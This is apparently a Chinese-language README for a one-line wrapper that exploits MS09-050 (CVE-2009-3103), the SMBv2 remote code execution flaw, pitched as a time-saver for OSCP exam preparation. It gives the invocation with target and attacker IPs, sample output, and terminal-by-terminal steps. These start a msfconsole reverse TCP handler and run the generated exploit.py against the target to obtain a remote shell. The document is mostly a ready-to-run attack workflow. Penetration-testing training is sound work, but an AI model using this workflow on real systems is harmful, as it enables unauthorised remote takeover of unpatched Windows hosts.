MS09-050 (CVE-2009-3103) 漏洞利用的一行设置。无需折腾,无需调试,直接生效。
大多数流传的 MS09-050 脚本需要手动注入 shellcode,与处理程序存在时序问题,或者干脆无法运行。本包装器:
专为 OSCP 备考打造,时间至关重要。
msfvenommsfconsolepython2rpcclient (通常预装)./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]
./ms09_050.sh 192.168.233.40 192.168.45.232 443
输出:
[*] 目标: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
[*] 正在生成 shellcode...
[+] 已创建文件:
- exploit.py
- handler.rc
=== 运行 ===
终端 1: msfconsole -q -r handler.rc
终端 2: python2 exploit.py 192.168.233.40
终端 1 — 启动处理程序:
msfconsole -q -r handler.rc
等待显示:Started reverse TCP handler on ...
终端 2 — 运行漏洞利用:
python2 exploit.py 192.168.233.40
查看终端 1 获取 shell。
windows/shell/reverse_tcp) — 与此漏洞利用中的 stager 配合稳定原始漏洞利用基于 ohnozzy 的 MS09-050 PoC。
MIT — 做你想做的,只是不要作恶。